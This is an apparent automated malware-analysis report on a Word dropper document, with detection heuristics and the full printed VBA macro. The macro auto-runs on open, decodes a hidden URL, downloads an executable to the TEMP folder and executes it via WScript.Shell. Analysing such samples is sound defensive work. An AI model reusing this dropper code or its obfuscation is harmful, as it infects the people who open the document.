MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for malicious documents. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to execute commands or download additional content. The obfuscated nature of the VBA code and the presence of a benign-looking URL that is likely a placeholder or misdirection point towards a downloader or dropper functionality.
Heuristics 11
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim GkJzXt As String, qqQWMQOv As Integer Set KAhKKpGlzU = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Public Function JXBzmLfW() As Object Set JXBzmLfW = CreateObject("ADODB.Stream") End Function -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Dim AyqGqXefQ As String igJOtE = CallByName(njYPWrJSMM, ldaWc, 2) End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim mttSwvbe As Integer -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly000023FE 40 inc eax 000023FF 40 inc eax 00002400 40 inc eax 00002401 40 inc eax 00002402 40 inc eax 00002403 40 inc eax 00002404 40 inc eax 00002405 40 inc eax 00002406 40 inc eax 00002407 40 inc eax 00002408 40 inc eax 00002409 40 inc eax 0000240A 40 inc eax 0000240B 40 inc eax 0000240C 40 inc eax 0000240D 40 inc eax 0000240E 40 inc eax 0000240F 40 inc eax 00002410 40 inc eax 00002411 40 inc eax 00002412 40 inc eax 00002413 40 inc eax 00002414 40 inc eax 00002415 40 inc eax 00002416 40 inc eax 00002417 40 inc eax 00002418 40 inc eax 00002419 40 inc eax 0000241A 40 inc eax 0000241B 40 inc eax 0000241C 40 inc eax 0000241D 40 inc eax 0000241E 40 inc eax 0000241F 40 inc eax 00002420 40 inc eax 00002421 40 inc eax 00002422 40 inc eax 00002423 40 inc eax 00002424 40 inc eax 00002425 40 inc eax 00002426 40 inc eax 00002427 40 inc eax 00002428 40 inc eax 00002429 40 inc eax 0000242A 40 inc eax 0000242B 40 inc eax 0000242C 40 inc eax 0000242D 40 inc eax 0000242E 40 inc eax 0000242F ffc0 inc eax 00002431 0011 add byte ptr [ecx], dl 00002433 0800 or byte ptr [eax], al 00002435 7800 js 0x2437 00002437 96 xchg esi, eax 00002438 0301 add eax, dword ptr [ecx] 0000243A 2200 and al, byte ptr [eax] 0000243C 0211 add dl, byte ptr [ecx] 0000243E 0103 add dword ptr [ebx], eax 00002440 1101 adc dword ptr [ecx], eax 00002442 ffc4 inc esp 00002444 007900 add byte ptr [ecx], bh 00002447 0100 add dword ptr [eax], eax 00002449 0202 add al, byte ptr [edx] 0000244B 0301 add eax, dword ptr [ecx] 0000244D 0000 add byte ptr [eax], al 0000244F 0000 add byte ptr [eax], al 00002451 0000 add byte ptr [eax], al 00002453 0000 add byte ptr [eax], al 00002455 0000 add byte ptr [eax], al 00002457 000406 add byte ptr [esi + eax], al 0000245A 03 .byte 0x03 0000245B 05 .byte 0x05 0000245C 0207 add al, byte ptr [edi]
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9063 bytes |
SHA-256: 491da5bc70e68e2bcfc429751d331e78be923dfee5123b6ac4caff3c1d8f1f8b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
173 of 246 identifiers look randomly generated (e.g. 'SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function JqSvkGCPGA() As Integer
hFrQPtBp
iOEGGBQELK
JqSvkGCPGA = 4779
End Function
Private Sub Document_Open()
Dim mttSwvbe As Integer
wyGWpY.pbSZCXhmSD
End Sub
Private Sub HgMddfJ(ByVal wnaYy As Integer)
kKhjcbO
If kbFfJcWPDT("fJB17jk5p", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "RlRkIP7MU19", 762
End If
End Sub
Private Sub tboKsvkN(ByVal QFlarOMYH As Integer, ByVal HPkFLb As Integer)
WbFWObBP
End Sub
Private Sub WYPBWcKU(ByVal rPhzMg As String, ByVal wcQpWQl As Boolean)
hpyzkXXV "8XydRQkTGiMrmox", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "B0xDIQATZFOts"
KvgAFCY
HSewNUUfX "B7djm91Oy"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub
Attribute VB_Name = "Ithby"
Private Function GbkVYXuh() As Boolean
puBqPC False, "kaC5cYrlDrvDp"
GbkVYXuh = True
End Function
Private Sub DYnUp(ByVal UrZpgn As String, ByVal PNDGAns As Integer)
oRQsMB
End Sub
Public Function WMJcdb(ByVal vBbzbEV As String, ByVal aJqFS As String) As String
Dim qqqGmed As Boolean, JgXpwpW As String
For zNoozTBlcV = 1 To Len(vBbzbEV)
qqqGmed = yohIEvNDuU.jpjwnKChj(yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV), aJqFS, 638)
MWgdETofR = 5559
If Not qqqGmed Then
WMJcdb = WMJcdb & yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV)
LICDvxAOy = 7085
End If
Next
End Function
Private Function TepKJZzNjv() As Boolean
RiNRh 3745
TepKJZzNjv = True
End Function
Private Function PgqZWnW(ByVal ibMyK As Integer, ByVal xpnMVUt As Integer) As String
wzDcvaHzAL "kI526hU65u"
lLNzEN 414
yvqqniWt 6874, False, True
PgqZWnW = "3olpYJqw9J3n"
End Function
Attribute VB_Name = "SdkIZOeRT"
Public Function igJOtE(ByVal njYPWrJSMM As Object, ByVal ldaWc As String) As Variant
Dim AyqGqXefQ As String
igJOtE = CallByName(njYPWrJSMM, ldaWc, 2)
End Function
Public Sub pOJmNb(ByVal yClPgtlq As Variant, ByVal PSoJbKoEba As Variant, ByVal bxDAQNTzFR As String, ByVal oSHsWLUbG As Object)
CallByName oSHsWLUbG, bxDAQNTzFR, 1, yClPgtlq, PSoJbKoEba
End Sub
Public Sub ISoSx(ByVal kHdGTYNKtC As String, ByVal eqBYT As Integer, ByVal nHPJawCsAX As Object, ByVal WApkqBkVA As Variant, ByVal XQkBMm As String)
Dim wekeFAKS As Boolean, YoAekV As String
CallByName nHPJawCsAX, kHdGTYNKtC, 1, WApkqBkVA
End Sub
Public Sub nyVis(ByVal CosRCSg As String, ByVal LOMaAFXq As Object)
Dim OLqsgyKydz As Integer, klFXu As Integer
CallByName LOMaAFXq, CosRCSg, 1
End Sub
Public Sub nBEdpfoE(ByVal KwfoJtk As Variant, ByVal WFHGLp As Variant, ByVal wlFegzlvgk As Boolean, ByVal nczauBS As Variant, ByVal yCUkSvZ As String, ByVal SPWDW As Object)
Dim KYLDLixc As Boolean
OWoNkkz = "AQJOV7YRmX5yV"
CallByName SPWDW, yCUkSvZ, 1, WFHGLp, nczauBS, KwfoJtk
End Sub
Public Function kwcXIuGy(ByVal aWlnczuLx As String, ByVal iROcCO As Boolean, ByVal TjNlOT As Integer, ByVal SPWDW As Object, ByVal IuNfhZ As String) As Variant
Set kwcXIuGy = CallByName(SPWDW, aWlnczuLx, 2, IuNfhZ)
End Function
Public Sub LrnQauZ(ByVal hlUbE As Integer, ByVal LwsvZ As String, ByVal ycGOStjrZ As Integer, ByVal vHzOKu As Variant, ByVal DHNjqjc As Object)
Dim kWSBuH As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName DHNjqjc, LwsvZ, 4, vHzOKu
End Sub
Attribute VB_Name = "tvRhy"
Public Function JXBzmLfW() As Object
Set JXBzmLfW = CreateObject("ADODB.Stream")
End Function
Public Function UXVspUID() As Object
Dim pOOVI As Integer
Set UXVspUID = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function KAhKKpGlzU() As Object
Dim GkJzXt As String, qqQWMQOv As Integer
Set KAhKKpGlzU = CreateObject("WScript.Shell")
End Function
Attribute VB_Name = "wyGWpY"
Private Function QXrMrsQ() As String
QXrMrsQ = Ithby.WMJcdb("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function scjAPmCwO() As String
Dim lGbQqfR As Integer
Dim IhUBVCEbAW As Boolean
scjAPmCwO = bYQQFY(FREjEkH, towxipv, towxipv) & SKxccKIV
End Function
Private Sub hvlgmlO(ByVal wyWIWLuRIj As String, ByVal WUBDjJ As Boolean, ByVal PuKhJZxo As Integer, ByVal BusaGxT As Variant)
Dim IHZRneyP As Boolean, CwzbrzK As Integer
Set QhWGb = tvRhy.JXBzmLfW
SdkIZOeRT.LrnQauZ 708, Ithby.WMJcdb("Taayqpae", "7qa."), 3110, 1, QhWGb
SdkIZOeRT.nyVis Ithby.WMJcdb("OXpresns", "r.Xtsu"), QhWGb
SdkIZOeRT.ISoSx Ithby.WMJcdb("EWrQi3EteE", "3QEN"), 6128, QhWGb, BusaGxT, fvzkjXLk
SdkIZOeRT.pOJmNb wyWIWLuRIj, 2, xAOKQ, QhWGb
SdkIZOeRT.nyVis VajxKpN, QhWGb
End Sub
Private Sub xdPBYHjHn()
Dim yDPim As Boolean, OBfNwD As String
On Error GoTo lcLlmF
CrqRpOlM 2612, scjAPmCwO, SilHR
NHFOEgVeoo scjAPmCwO
RPCxFN = "z33eikgFE"
Exit Sub
vkLGZ = 5682
lcLlmF:
End Sub
Private Function fvzkjXLk() As String
fvzkjXLk = "Hm9PzpqXM8Tk"
End Function
Private Sub NHFOEgVeoo(ByVal miSGHSYuNw As String)
SdkIZOeRT.ISoSx zyGqC, 6128, tvRhy.KAhKKpGlzU, miSGHSYuNw, XNPJQFXYf
End Sub
Private Function XNPJQFXYf() As String
XNPJQFXYf = "Jq6p51kMY"
End Function
Private Function bYQQFY(ByVal GSaGv As String, ByVal UTbiy As String, ByVal ypnxtROJG As String) As String
Dim FFDtdQ As String
JixRwEJkN = False
Set ectSqGDH = SdkIZOeRT.kwcXIuGy(Ithby.WMJcdb("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, tvRhy.KAhKKpGlzU, Ithby.WMJcdb("wPR6Od6CdESwiS", "xdtw6i"))
bYQQFY = ectSqGDH(GSaGv)
End Function
Private Function SilHR() As String
Dim MpmvU As Boolean
Dim exxvbLptH As Boolean
SilHR = gOwGIDiAO
End Function
Private Function haUcDjaieH() As String
NXgcHedZ = "lJXprLrLKbix"
haUcDjaieH = Ithby.WMJcdb("S2Ce2nd2", "2Co")
End Function
Private Function gOwGIDiAO() As String
gOwGIDiAO = Ithby.WMJcdb("hPCtEtEp:b/IP/oblPCcCabyEfobtEoEPgErIabf.IcEoYmC/bsbybCsEtIeCm/CPcaEPcbhYe/bwCYoCrEdP.eYExeC", "IPCEbY")
End Function
Private Function SKxccKIV() As String
Dim bZoLtgFpw As String
SKxccKIV = JupTi
End Function
Private Function VajxKpN() As String
VajxKpN = Ithby.WMJcdb("Ciliopiske", "tkpi")
End Function
Private Sub Kqnuz(ByVal dlxdZiiDh As Integer, ByVal olcBEYEmB As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "tf0zmSAodfN"
End Sub
Private Function zyGqC() As String
JywcHztmR = "d4OR3A9CGIEikH"
zyGqC = Ithby.WMJcdb("rEWxteWc", "1rWt")
End Function
Private Function YnBzQ() As String
If pjTUCKd(5843, "woONT25Thy") Then
zeMphePZDz 1173, "I2g1yWKwm"
zUtoVINdP 2806, "la8LZGheRu", 559
jvyLJjMjyn
End If
YnBzQ = "DBI3Lm69ouaxgNX"
End Function
Private Function XvQcr() As String
XvQcr = Ithby.WMJcdb("VMQoVziGlQlQQav/5Vv.Q0 QQ(QcVoQmpvaVtQviGbGlVeV; GMGGSIvvEV 9V.vG0;VV WViQGnvdoQwQVsv NQVTG 7Q.QG1V;Q TvvriQdVevnvGt/GQ5G.G0)v", "vVQG")
End Function
Private Function jEAYTHsh() As String
jEAYTHsh = Ithby.WMJcdb("OXpresns", "r.Xtsu")
End Function
Private Sub CrqRpOlM(ByVal tAAsHrFZ As Integer, ByVal eFaIBUyeVu As String, ByVal RYojJhb As String)
Dim FWmFFOn As Integer, QmSSGLrIL As Integer
Set SwsQIpxEC = tvRhy.UXVspUID
vAhuigCxLB = "6Z6ITHFTp"
SdkIZOeRT.nBEdpfoE False, Ithby.WMJcdb("6GE Ta", " a96S"), False, RYojJhb, jEAYTHsh, SwsQIpxEC
SdkIZOeRT.pOJmNb Ithby.WMJcdb("U.sNeTNrN-ANgNTenNt.", "mT.N"), XvQcr, Ithby.WMJcdb("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), SwsQIpxEC
SdkIZOeRT.nyVis haUcDjaieH, SwsQIpxEC
hvlgmlO eFaIBUyeVu, True, 3347, SdkIZOeRT.igJOtE(SwsQIpxEC, QXrMrsQ)
End Sub
Private Function JupTi() As String
JupTi = Ithby.WMJcdb("P/cF3w8B7P6FBdF00pdF7hh3dB.FeFxFPe", "wBhPFp")
End Function
Public Sub pbSZCXhmSD()
Dim BCcHV As Integer
xdPBYHjHn
End Sub
Private Function OsKGshuod() As Integer
WmkFh
cIsPekWV 9366
OsKGshuod = 9266
End Function
Private Function towxipv() As String
towxipv = "DISj4y0ywL7NH7g"
End Function
Private Function xAOKQ() As String
xAOKQ = Ithby.WMJcdb("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function FREjEkH() As String
FREjEkH = Ithby.WMJcdb("ZTEZIMPZ", "ZoWIO")
End Function
Attribute VB_Name = "yohIEvNDuU"
Private Sub pUdTu(ByVal aqxVWbfR As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub nUSoQrDd()
UKUhJchCfN False
UOlvZCoKSe "kzpKzUEINlR4N", 3119
BWDat "xpqAZayG7hMN"
End Sub
Private Function ddtCtq(ByVal FCWjcNQVF As String, ByVal vuVaS As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
ddtCtq = True
End Function
Private Sub VlzvwFRdHT(ByVal LCDzSSLr As Boolean, ByVal jCFsafeZa As String)
mokZnpH
HulbI "OGUUM2KcfmcPa"
End Sub
Public Function jpjwnKChj(ByVal sXfnOZpB As String, ByVal XApeM As String, ByVal WGDoQDr As Integer) As Boolean
Dim LuJmzfrRdU As Boolean
jpjwnKChj = InStr(1, XApeM, sXfnOZpB)
End Function
Public Function jdqox(ByVal RKlkWqrIQ As String, ByVal YXFBGbGx As Integer) As String
Dim auYmv As Boolean
Dim tAzuDfeyPm As Boolean
jdqox = Mid(RKlkWqrIQ, YXFBGbGx, 1)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.